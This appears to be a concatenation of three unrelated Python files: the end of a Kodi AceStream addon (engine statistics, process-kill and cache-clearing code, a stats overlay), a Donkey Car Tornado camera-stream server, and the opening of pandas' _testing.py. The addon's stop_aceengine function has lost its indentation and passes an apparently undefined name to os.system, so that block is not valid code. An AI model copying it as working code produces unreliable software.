            if settings.getSetting('debug_mode') == "true":
                print('Received command loading' )
        elif st=='dl':
            engine_data = { "action": str(translate(30060)), "percent": str(params.split(';')[1])+ "%","download":str(params.split(';')[3]) + " Kb/s", "upload":str(params.split(';')[5]) + " Kb/s","seeds":str(params.split(';')[6]),"total_download":str(int(params.split(';')[8])/(1024*1024))+'Mb',"total_upload":str(int(params.split(';')[10])/(1024*1024))+'Mb' }
            if settings.getSetting('engine-status') == "true":
                try:
                    lat123.set_information(engine_data)
                except: pass
            if settings.getSetting('debug_mode') == "true":
                print('Received command: ' + str(engine_data) )
        elif st=='buf':
            engine_data = { "action": str(translate(30061)), "percent": str(params.split(';')[1])+ "%","download":str(params.split(';')[5]) + " Kb/s", "upload":str(params.split(';')[7]) + " Kb/s","seeds":str(params.split(';')[8]),"total_download":str(int(params.split(';')[10])/(1024*1024))+"Mb","total_upload":str(int(params.split(';')[12])/(1024*1024))+"Mb" }
            if settings.getSetting('engine-status') == "true":
                try:
                    lat123.set_information(engine_data)
                except: pass
            if settings.getSetting('debug_mode') == "true":
                print('Received command: ' + str(engine_data) )
    def end(self):
        # Ask run() to exit; the thread is joined by the owner.
        self.active = False
        self.daemon = False
        self.log.out('Daemon Fully Dead')
#thread to run the kill command right after the user hits stop
def ace_control_thread():
    # Poll JSON-RPC every 500 ms until no player is active, then shut the
    # AceStream engine down.
    while json.loads(xbmc.executeJSONRPC('{"jsonrpc":"2.0","method":"Player.GetActivePlayers","params":{},"id":3}'))["result"]:
        xbmc.sleep(500)
    stop_aceengine()
#TODO - Windows and proper cache clear
def stop_aceengine():
if settings.getSetting('shutdown-engine') == 'true' and settings.getSetting('kill_type') == '0':
if xbmc.getCondVisibility('system.platform.windows'):
subprocess.Popen('taskkill /F /IM ace_engine.exe /T',shell=True)
#Need to finish this...
#if settings.getSetting('save') != "true":
# try:
# cache_file = self.lnk.split('/')[-2]
# acestream_cachefolder_file = os.path.join(os.getenv("SystemDrive"),'\_acestream_cache_',cache_file)
# xbmcvfs.delete(acestream_cachefolder_file)
# except: pass
elif xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('System.Platform.Android'):
if "arm" in os.uname()[4]:
os.system("sh "+os.path.join(pastaperfil,"acestream","stop_acestream.sh"))
else:
os.system("kill $(ps aux | grep '[a]cestream' | awk '{print $1}')")
os.system("kill $(ps aux | grep '[a]cestream' | awk '{print $2}')")
if settings.getSetting('save') != "true":
try:
cache_file = xbmc.Player().getPlayingFile().split('/')[-2]
if 'arm' not in os.uname()[4]:
if settings.getSetting('acestream_cachefolder') == '': acestream_cachefolder_file = os.path.join(os.getenv("HOME"),'.ACEStream','cache','.acestream_cache')
else: acestream_cachefolder_file = settings.getSetting('acestream_cachefolder')
else:
if settings.getSetting('acestream_cachefolder') == '': acestream_cachefolder_file = os.path.join(os.getenv("HOME"),'.ACEStream','cache')
else: acestream_cachefolder_file = settings.getSetting('acestream_cachefolder')
folder,cachefiles = xbmcvfs.listdir(acestream_cachefolder_file)
for cachefile in cachefiles:
if cache_file in cachefile:
xbmcvfs.delete(os.path.join(acestream_cachefolder_file,cachefile))
except: pass
elif xbmc.getCondVisibility('system.platform.OSX'):
try:
kill_cmd = [os.path.join('/Applications','Ace Stream.app','Contents','Resources','Wine.bundle','Contents','Resources','bin','wine'),os.path.join('/Applications','Ace Stream.app','Contents','Resources','wineprefix','drive_c','windows','system','taskkill.exe'),'/f','/im','ace_engine.exe']
kill_proc = subprocess.Popen(kill_cmd,shell=False)
except: pass
elif xbmc.getCondVisibility('System.Platform.Android'):
try:
procshut_ace = subprocess.Popen(['ps','|','grep','python'],shell=False,stdout=subprocess.PIPE)
for line in procshut_ace.stdout:
match = re.findall(r'\S+', line.rstrip())
if match:
if 'acestream' in match[-1] and len(match)>2:
os.system("kill " + match[1])
xbmc.sleep(200)
except: pass
if settings.getSetting('save') != "true":
try:
if settings.getSetting('acestream_cachefolder') != '':
dirs, cache_files = xbmcvfs.listdir(os.path.join(settings.getSetting('acestream_cachefolder'),'.acestream_cache'))
print dirs,cache_files
for cache_file in cache_files:
xbmcvfs.delete(os.path.join(settings.getSetting('acestream_cachefolder'),'.acestream_cache',cache_file))
else:
acestream_cachefolder_file = os.path.join('/sdcard','.ACEStream','cache','.acestream_cache')
dirs, cache_files = xbmcvfs.listdir(acestream_cachefolder_file)
for cache_file in cache_files:
xbmcvfs.delete(os.path.join(acestream_cachefolder_file,cache_file))
except: pass
else:
if settings.getSetting('shutdown-engine') == 'true' and settings.getSetting('kill_type') == '1':
os.system(settings.getSetting(custom_kill_ace))
return
class OverlayText(object):
    # On-screen engine-statistics overlay rendered on top of the fullscreen
    # video window (12005). All control positions are derived from the
    # skin resolution so the panel scales with the skin.
    def __init__(self):
        self.showing = False
        self.window = xbmcgui.Window(12005)
        viewport_w, viewport_h = self._get_skin_resolution()
        font_max = 'font13'
        font_min = 'font10'
        # Panel geometry as fixed fractions of the skin viewport.
        origin_x = int(float(viewport_w)/1.3913)
        origin_y = int(float(viewport_h)/8.0)
        window_w = int(float(viewport_w)/3.7647)
        window_h = int(float(viewport_h)/2.5714)
        acelogo_w = int(float(window_w)/8.5)
        acelogo_h = int(float(window_w)/11.0)
        text_lat = int(float(window_w)/15)
        text_w = int(float(window_w)/1.7)
        text_h = int(float(window_h)/14)
        fst_setting = int(float(window_h)/3.5)
        fst_stat_setting = int(float(window_h)/1.4)
        #main window
        self._background = xbmcgui.ControlImage(origin_x, origin_y, window_w, window_h, os.path.join(addonpath,"resources","art","background.png"))
        self._acestreamlogo = xbmcgui.ControlImage(origin_x + int(float(window_w)/11.3), origin_y + int(float(window_h)/14), acelogo_w, acelogo_h, os.path.join(addonpath,"resources","art","acestreamlogo.png"))
        self._supseparator = xbmcgui.ControlImage(origin_x, origin_y + int(float(viewport_h)/12.176), window_w-10, 1, os.path.join(addonpath,"resources","art","separator.png"))
        self._botseparator = xbmcgui.ControlImage(origin_x, origin_y + window_h - 30, window_w-10, 1, os.path.join(addonpath,"resources","art","separator.png"))
        self._title = xbmcgui.ControlLabel(origin_x+int(float(window_w)/3.4), origin_y + text_h, window_w - 140, text_h, str(translate(30062)), font=font_max, textColor='0xFFEB9E17')
        self._total_stats_label = xbmcgui.ControlLabel(origin_x+int(float(window_h)/1.72), origin_y + int(float(window_h)/1.6), int(float(window_w)/1.7), 20, str(translate(30063)), font=font_min, textColor='0xFFEB9E17')
        #labels (filled in by set_information)
        self._action = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting, int(float(text_w)*1.6), text_h, str(translate(30064)) + ' N/A', font=font_min)
        self._download = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting + text_h, int(float(text_w)*1.6), text_h, str(translate(30065)) + ' N/A', font=font_min)
        self._upload = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting + 2*text_h, text_w, text_h, str(translate(30066)) + ' N/A', font=font_min)
        self._seeds = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting + 3*text_h, text_w, text_h, str(translate(30067)) + ' N/A', font=font_min)
        self._total_download = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_stat_setting, text_w, text_h, str(translate(30068)) + ' N/A', font=font_min)
        self._total_upload = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_stat_setting + text_h, text_w, text_h, str(translate(30069)) + ' N/A', font=font_min)
        self._percent_value = xbmcgui.ControlLabel(origin_x+int(float(window_h)/1.05), origin_y + fst_setting, text_w, text_h,'N/A', font=font_min)
    def show(self):
        # Attach every control to the video window.
        self.showing=True
        self.window.addControl(self._background)
        self.window.addControl(self._acestreamlogo)
        self.window.addControl(self._supseparator)
        self.window.addControl(self._botseparator)
        self.window.addControl(self._title)
        self.window.addControl(self._action)
        self.window.addControl(self._download)
        self.window.addControl(self._upload)
        self.window.addControl(self._seeds)
        self.window.addControl(self._total_stats_label)
        self.window.addControl(self._total_download)
        self.window.addControl(self._total_upload)
        self.window.addControl(self._percent_value)
    def hide(self):
        # Detach every control again (roughly reverse order of show()).
        self.showing=False
        self.window.removeControl(self._total_download)
        self.window.removeControl(self._total_upload)
        self.window.removeControl(self._percent_value)
        self.window.removeControl(self._title)
        self.window.removeControl(self._action)
        self.window.removeControl(self._download)
        self.window.removeControl(self._upload)
        self.window.removeControl(self._seeds)
        self.window.removeControl(self._total_stats_label)
        self.window.removeControl(self._acestreamlogo)
        self.window.removeControl(self._supseparator)
        self.window.removeControl(self._botseparator)
        self.window.removeControl(self._background)
    def set_information(self,engine_data):
        # Update the stat labels from the dict built in TSServ.showStats.
        if self.showing == True:
            self._action.setLabel(str(translate(30064)) + ' ' + engine_data["action"])
            self._percent_value.setLabel(engine_data["percent"])
            self._download.setLabel(str(translate(30065))+ ' ' + engine_data["download"])
            self._upload.setLabel(str(translate(30066)) + ' ' + engine_data["upload"])
            self._seeds.setLabel(str(translate(30067)) + ' ' + engine_data["seeds"])
            self._total_download.setLabel(str(translate(30068)) + ' ' + engine_data["total_download"])
            self._total_upload.setLabel(str(translate(30069)) + ' ' + engine_data["total_upload"])
        else: pass
    def _close(self):
        # Hide (if visible) and release the window's properties.
        if self.showing:
            self.hide()
        else:
            pass
        try:
            self.window.clearProperties()
            print("OverlayText window closed")
        except: pass
    #Taken from xbmctorrent
    def _get_skin_resolution(self):
        # Read the active skin's declared resolution from its addon.xml.
        import xml.etree.ElementTree as ET
        skin_path = xbmc.translatePath("special://skin/")
        tree = ET.parse(os.path.join(skin_path, "addon.xml"))
        try: res = tree.findall("./res")[0]
        except: res = tree.findall("./extension/res")[0]
        return int(res.attrib["width"]), int(res.attrib["height"])
|
__init__.py
|
import io
import json
import logging
import os
import random
import socket
import time
import threading
import tornado
import tornado.ioloop
import tornado.web
import tornado.gen
import numpy as np
import PIL.Image
from .. import base
logger = logging.getLogger(__name__ )
def get_ip_address():
    """
    Return the primary non-loopback IPv4 address of this host.

    Resolves the local hostname first; if that yields only loopback
    addresses, a UDP socket is connected "towards" 8.8.8.8 (no packets are
    actually sent) and the interface address chosen by the routing table is
    read back. Falls back to 127.0.0.1 when the network is unreachable.

    The original one-liner always opened the UDP socket (both alternatives
    were built eagerly) and an OSError discarded an already-found hostname
    address; this version only falls back when needed.
    """
    try:
        # Addresses registered for our hostname, minus loopback entries.
        candidates = [
            ip
            for ip in socket.gethostbyname_ex(socket.gethostname())[2]
            if not ip.startswith("127.")
        ]
        if candidates:
            return candidates[0]
        # Connected UDP socket reveals the outgoing interface address.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(('8.8.8.8', 53))
            return s.getsockname()[0]
    except OSError:  # occurs when we cannot route to '8.8.8.8'
        return "127.0.0.1"  # loopback
def arr_to_binary(arr):
    """
    accepts: PIL image
    returns: binary stream (used to save to database)
    """
    # Coerce to uint8 pixels, encode as JPEG into an in-memory buffer.
    image = PIL.Image.fromarray(np.uint8(arr))
    buffer = io.BytesIO()
    image.save(buffer, format='jpeg')
    return buffer.getvalue()
class WebStatus(tornado.web.Application):
    """Tornado application serving the vehicle's camera stream and status.

    Constructing an instance has side effects: it binds ``port`` and starts
    the IOLoop on a daemon thread, so the server is live immediately.
    """

    # TCP port the server listens on (also hard-coded in say_hello's URL).
    port = 8887
    def __init__(self):
        logger.info('Starting Donkey Server...')
        # Latest camera frame; replaced wholesale by set_image().
        self.img_arr = np.zeros((160, 120, 3))
        # Latest vehicle status object; read by UpdateAPI.
        self.status = {}
        # Flags written by StatusAPI.post from the web UI.
        self.recording = False
        self.drive_mode = "user"
        self.vehicle_running = False
        this_dir = os.path.dirname(os.path.realpath(__file__))
        self.static_file_path = os.path.join(this_dir, 'templates', 'static')
        handlers = [
            (r"/", tornado.web.RedirectHandler, dict(url="/status")),
            (r"/video", VideoAPI),
            (r"/status", StatusAPI),
            (r"/updates", UpdateAPI),
            (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": self.static_file_path}),
        ]
        settings = {'debug': True}
        super().__init__(handlers, **settings)
        self.listen(self.port)
        # Run the IOLoop on a background daemon thread so the constructor
        # returns while the server keeps serving.
        self.instance = tornado.ioloop.IOLoop.instance()
        self.instance.add_callback(self.say_hello)
        self._thread = threading.Thread(target=self.instance.start)
        self._thread.daemon = True
        self._thread.start()
    def say_hello(self):
        # Print the reachable URL once the loop is running.
        print("You can watch the camera stream at http://%s:8887/status" %
              (get_ip_address(), ))
    def stop(self):
        # Stop the IOLoop (and with it the server thread).
        self.instance.stop()
    def __del__(self):
        pass
        # self.stop()
    def set_image(self, img_arr):
        # Publish a new camera frame for VideoAPI to stream.
        self.img_arr = img_arr
    def set_car_status(self, status):
        # Publish a new status object for UpdateAPI to serialize.
        self.status = status
class UpdateAPI(tornado.web.RequestHandler):
    """Returns the current vehicle status as JSON."""
    def get(self):
        data = self.application.status
        if data:
            # Non-empty status is converted via _asdict() — presumably a
            # namedtuple set by set_car_status; TODO confirm against caller.
            data = data._asdict()
        self.write(json.dumps(data))
class StatusAPI(tornado.web.RequestHandler):
    """Serves the status dashboard and accepts control updates from it."""
    def get(self):
        # Render the dashboard template (no template variables needed).
        data = {}
        self.render("templates/status.html", **data)
    def post(self):
        """
        Receive post requests as the user changes recording, drive mode,
        or the running state of the vehicle on the status webpage.
        """
        data = tornado.escape.json_decode(self.request.body)
        self.application.recording = data["recording"]
        self.application.drive_mode = data["drive_mode"]
        self.application.vehicle_running = data["vehicle_running"]
class VideoAPI(tornado.web.RequestHandler):
    """
    Serves a MJPEG of the images posted from the vehicle.
    """
    # NOTE(review): @tornado.web.asynchronous was removed in Tornado 6 —
    # confirm the pinned Tornado version before upgrading.
    @tornado.web.asynchronous
    @tornado.gen.coroutine
    def get(self):
        ioloop = tornado.ioloop.IOLoop.current()
        # multipart/x-mixed-replace lets the browser replace each frame as
        # it arrives (classic MJPEG streaming).
        self.set_header("Content-type", "multipart/x-mixed-replace;boundary=--boundarydonotcross")
        self.served_image_timestamp = time.time()
        my_boundary = "--boundarydonotcross"
        while True:
            # Cap the stream at roughly 10 frames per second.
            interval = .1
            if self.served_image_timestamp + interval < time.time():
                img = arr_to_binary(self.application.img_arr)
                self.write(my_boundary)
                self.write("Content-type: image/jpeg\r\n")
                self.write("Content-length: %s\r\n\r\n" % len(img))
                self.write(img)
                self.served_image_timestamp = time.time()
                yield tornado.gen.Task(self.flush)
            else:
                # Not time for a new frame yet: yield to the IOLoop.
                yield tornado.gen.Task(ioloop.add_timeout, ioloop.time() + interval)
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, List, Optional, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
# Handle to the lzma module (pandas helper copes with builds lacking lzma).
lzma = _import_lzma()
# Default row/column counts used by test-data generators in this module —
# presumably consumed by makeDataFrame-style helpers; TODO confirm.
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode: warning categories forced to "always" when
# PANDAS_TESTING_MODE contains "deprecate".
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
    """Install the testing-mode warning filters requested via env var."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" in mode:
        # Surface every deprecation/resource warning during the test run.
        warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
    """Undo set_testing_mode by ignoring the testing-mode warnings again."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" in mode:
        warnings.simplefilter("ignore", _testing_mode_warnings)
# Apply the testing-mode warning filters as soon as the module is imported.
set_testing_mode()
def reset_display_options():
    """Restore every ``display.*`` option to its pandas default."""
    # The regex form of reset_option resets the whole namespace at once.
    pd.reset_option("^display.", silent=True)
def round_trip_pickle(
    obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
    """
    Pickle an object and then read it again.

    Parameters
    ----------
    obj : any object
        The object to pickle and then re-read.
    path : str, path object or file-like object, default None
        The path where the pickled object is written and then read.
        A random temporary name is generated when omitted.

    Returns
    -------
    pandas object
        The original object that was pickled and then re-read.
    """
    target = path if path is not None else f"__{rands(10)}__.pickle"
    with ensure_clean(target) as temp_path:
        pd.to_pickle(obj, temp_path)
        return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
    """
    Write an object to file specified by a pathlib.Path and read it back.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    pandas object
        The original object that was serialized and then re-read.
    """
    import pytest

    Path = pytest.importorskip("pathlib").Path
    target = "___pathlib___" if path is None else path
    with ensure_clean(target) as tmp:
        writer(Path(tmp))
        return reader(Path(tmp))
def round_trip_localpath(writer, reader, path: Optional[str] = None):
    """
    Write an object to file specified by a py.path LocalPath and read it back.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    pandas object
        The original object that was serialized and then re-read.
    """
    import pytest

    LocalPath = pytest.importorskip("py.path").local
    target = "___localpath___" if path is None else path
    with ensure_clean(target) as tmp:
        writer(LocalPath(tmp))
        return reader(LocalPath(tmp))
@contextmanager
def decompress_file(path, compression):
    """
    Open a compressed file and yield a binary file object.

    Parameters
    ----------
    path : str
        The path where the file is read from.
    compression : {'gzip', 'bz2', 'zip', 'xz', None}
        Name of the decompression to use

    Yields
    ------
    file object
    """
    zip_handle = None
    if compression is None:
        handle = open(path, "rb")
    elif compression == "gzip":
        handle = gzip.open(path, "rb")
    elif compression == "bz2":
        handle = bz2.BZ2File(path, "rb")
    elif compression == "xz":
        handle = _get_lzma_file(lzma)(path, "rb")
    elif compression == "zip":
        # ZIP archives must contain exactly one member.
        zip_handle = zipfile.ZipFile(path)
        members = zip_handle.namelist()
        if len(members) != 1:
            raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
        handle = zip_handle.open(members.pop())
    else:
        raise ValueError(f"Unrecognized compression type: {compression}")
    try:
        yield handle
    finally:
        handle.close()
        if zip_handle is not None:
            zip_handle.close()
def write_to_compressed(compression, path, data, dest="test"):
    """
    Write data to a compressed file.

    Parameters
    ----------
    compression : {'gzip', 'bz2', 'zip', 'xz'}
        The compression type to use.
    path : str
        The file path to write the data.
    data : str
        The data to write.
    dest : str, default "test"
        The destination file (for ZIP only)

    Raises
    ------
    ValueError : An invalid compression value was passed in.
    """
    if compression == "zip":
        compress_method = zipfile.ZipFile
    elif compression == "gzip":
        compress_method = gzip.GzipFile
    elif compression == "bz2":
        compress_method = bz2.BZ2File
    elif compression == "xz":
        compress_method = _get_lzma_file(lzma)
    else:
        raise ValueError(f"Unrecognized compression type: {compression}")
    # ZIP needs a member name and uses writestr; the rest write raw bytes.
    if compression == "zip":
        mode, method, args = "w", "writestr", (dest, data)
    else:
        mode, method, args = "wb", "write", (data,)
    with compress_method(path, mode=mode) as fh:
        getattr(fh, method)(*args)
def assert_almost_equal(
    left,
    right,
    check_dtype: Union[bool, str] = "equiv",
    check_less_precise: Union[bool, int] = False,
    **kwargs,
):
    """
    Check that the left and right objects are approximately equal.

    By approximately equal, we refer to objects that are numbers or that
    contain numbers which may be equivalent to specific levels of precision.

    Parameters
    ----------
    left : object
    right : object
    check_dtype : bool or {'equiv'}, default 'equiv'
        Check dtype if both a and b are the same type. If 'equiv' is passed in,
        then `RangeIndex` and `Int64Index` are also considered equivalent
        when doing type checking.
    check_less_precise : bool or int, default False
        Specify comparison precision. 5 digits (False) or 3 digits (True)
        after decimal points are compared. If int, then specify the number
        of digits to compare.

        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    """
    # Dispatch on the type of `left`: pandas containers go through their
    # dedicated assert_* helpers with exact checking disabled.
    if isinstance(left, pd.Index):
        assert_index_equal(
            left,
            right,
            check_exact=False,
            exact=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs,
        )
    elif isinstance(left, pd.Series):
        assert_series_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs,
        )
    elif isinstance(left, pd.DataFrame):
        assert_frame_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs,
        )
    else:
        # Other sequences.
        if check_dtype:
            if is_number(left) and is_number(right):
                # Do not compare numeric classes, like np.float64 and float.
                pass
            elif is_bool(left) and is_bool(right):
                # Do not compare bool classes, like np.bool_ and bool.
                pass
            else:
                if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
                    obj = "numpy array"
                else:
                    obj = "Input"
                assert_class_equal(left, right, obj=obj)
        # Fall through to the C-implemented scalar/sequence comparison.
        _testing.assert_almost_equal(
            left,
            right,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs,
        )
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
    # Assert two dicts are equal; type-checks both operands first, then
    # delegates the element-wise comparison to the C implementation.
    _check_isinstance(left, right, dict)
    _testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
    """Return random boolean(s) of shape ``size``, True with probability p."""
    draws = rand(*size)
    return draws <= p
# Pool of candidate characters (ASCII letters + digits) for random strings,
# stored as single-character elements so np.random.choice can sample them.
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
# Pool for random unicode strings: characters from U+05D0 onward plus digits.
RANDU_CHARS = np.array(
    list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
    dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
    """
    Generate an array of byte strings.
    """
    # Draw nchars * prod(size) single characters, then reinterpret each run
    # of nchars as one fixed-width string and restore the requested shape.
    flat = np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
    retval = flat.view((np.str_, nchars)).reshape(size)
    return retval if dtype is None else retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
    """
    Generate an array of unicode strings.
    """
    # Same trick as rands_array, but sampling from the unicode pool.
    flat = np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
    retval = flat.view((np.unicode_, nchars)).reshape(size)
    return retval if dtype is None else retval.astype(dtype)
def rands(nchars):
    """
    Generate one random byte string.

    See `rands_array` if you want to create an array of random strings.
    """
    chosen = np.random.choice(RANDS_CHARS, nchars)
    return "".join(chosen)
def randu(nchars):
    """
    Generate one random unicode string.

    See `randu_array` if you want to create an array of random unicode strings.
    """
    chosen = np.random.choice(RANDU_CHARS, nchars)
    return "".join(chosen)
def close(fignum=None):
    """Close one matplotlib figure, or all open figures when fignum is None."""
    from matplotlib.pyplot import get_fignums, close as _close

    if fignum is not None:
        _close(fignum)
        return
    for num in get_fignums():
        _close(num)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
    """
    Gets a temporary path and agrees to remove on close.

    Parameters
    ----------
    filename : str (optional)
        if None, creates a temporary file which is then removed when out of
        scope. if passed, creates temporary file with filename as ending.
    return_filelike : bool (default False)
        if True, returns a file-like which is *always* cleaned. Necessary for
        savefig and other functions which want to append extensions.

    Raises
    ------
    ValueError
        If *filename* contains a directory component (only bare names are
        accepted; the directory is chosen by ``tempfile``).
    """
    filename = filename or ""
    fd = None
    if return_filelike:
        f = tempfile.TemporaryFile(suffix=filename)
        try:
            yield f
        finally:
            f.close()
    else:
        # don't generate tempfile if using a path with directory specified
        if len(os.path.dirname(filename)):
            raise ValueError("Can't pass a qualified name to ensure_clean()")
        try:
            fd, filename = tempfile.mkstemp(suffix=filename)
        except UnicodeEncodeError:
            import pytest
            pytest.skip("no unicode file names on this system")
        try:
            yield filename
        finally:
            try:
                os.close(fd)
            except OSError:
                # BUG FIX: message previously printed a stale literal
                # placeholder instead of interpolating the actual filename
                print(f"Couldn't close file descriptor: {fd} (file: {filename})")
            try:
                if os.path.exists(filename):
                    os.remove(filename)
            except OSError as e:
                # cleanup is best-effort; report but don't mask the body's result
                print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
    """
    Yield a freshly created temporary directory path, deleting it on exit.

    Yields
    ------
    str
        Path of the temporary directory; removed (best effort) on close.
    """
    path = tempfile.mkdtemp(suffix="")
    try:
        yield path
    finally:
        try:
            rmtree(path)
        except OSError:
            # best-effort cleanup: ignore failures (e.g. files still open)
            pass
@contextmanager
def ensure_safe_environment_variables():
    """
    Context manager that snapshots ``os.environ`` and restores it on exit,
    so environment changes made inside the block never leak out or persist.
    """
    snapshot = dict(os.environ)
    try:
        yield
    finally:
        os.environ.clear()
        os.environ.update(snapshot)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
    """
    Return True when arr1 and arr2 contain the same set of unique elements
    (order and multiplicity are ignored; elements must be hashable).
    """
    return set(arr1) == set(arr2)
def assert_index_equal(
    left: Index,
    right: Index,
    exact: Union[bool, str] = "equiv",
    check_names: bool = True,
    check_less_precise: Union[bool, int] = False,
    check_exact: bool = True,
    check_categorical: bool = True,
    obj: str = "Index",
) -> None:
    """
    Check that left and right Index are equal.

    Parameters
    ----------
    left : Index
    right : Index
    exact : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    check_names : bool, default True
        Whether to check the names attribute.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
    check_exact : bool, default True
        Whether to compare number exactly.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    obj : str, default 'Index'
        Specify object name being compared, internally used to show appropriate
        assertion message.

    Raises
    ------
    AssertionError
        If any of the enabled checks fails.
    """
    __tracebackhide__ = True
    # Compare class / dtype / inferred_type of two indexes, gated by `exact`.
    def _check_types(l, r, obj="Index"):
        if exact:
            assert_class_equal(l, r, exact=exact, obj=obj)
            # Skip exact dtype checking when `check_categorical` is False
            if check_categorical:
                assert_attr_equal("dtype", l, r, obj=obj)
            # allow string-like to have different inferred_types
            if l.inferred_type in ("string", "unicode"):
                assert r.inferred_type in ("string", "unicode")
            else:
                assert_attr_equal("inferred_type", l, r, obj=obj)
    # Materialize one level of a MultiIndex without changing its dtype
    # (get_level_values may cast, which would defeat the dtype check).
    def _get_ilevel_values(index, level):
        # accept level number only
        unique = index.levels[level]
        level_codes = index.codes[level]
        filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
        values = unique._shallow_copy(filled, name=index.names[level])
        return values
    # instance validation
    _check_isinstance(left, right, Index)
    # class / dtype comparison
    _check_types(left, right, obj=obj)
    # level comparison
    if left.nlevels != right.nlevels:
        msg1 = f"{obj} levels are different"
        msg2 = f"{left.nlevels}, {left}"
        msg3 = f"{right.nlevels}, {right}"
        raise_assert_detail(obj, msg1, msg2, msg3)
    # length comparison
    if len(left) != len(right):
        msg1 = f"{obj} length are different"
        msg2 = f"{len(left)}, {left}"
        msg3 = f"{len(right)}, {right}"
        raise_assert_detail(obj, msg1, msg2, msg3)
    # MultiIndex special comparison for little-friendly error messages
    if left.nlevels > 1:
        left = cast(MultiIndex, left)
        right = cast(MultiIndex, right)
        for level in range(left.nlevels):
            # cannot use get_level_values here because it can change dtype
            llevel = _get_ilevel_values(left, level)
            rlevel = _get_ilevel_values(right, level)
            lobj = f"MultiIndex level [{level}]"
            # NOTE(review): check_categorical is not forwarded to this
            # recursive call, so levels are always compared with the
            # default (True) -- confirm this is intended.
            assert_index_equal(
                llevel,
                rlevel,
                exact=exact,
                check_names=check_names,
                check_less_precise=check_less_precise,
                check_exact=check_exact,
                obj=lobj,
            )
            # get_level_values may change dtype
            _check_types(left.levels[level], right.levels[level], obj=obj)
    # skip exact index checking when `check_categorical` is False
    if check_exact and check_categorical:
        if not left.equals(right):
            # report the percentage of differing positions
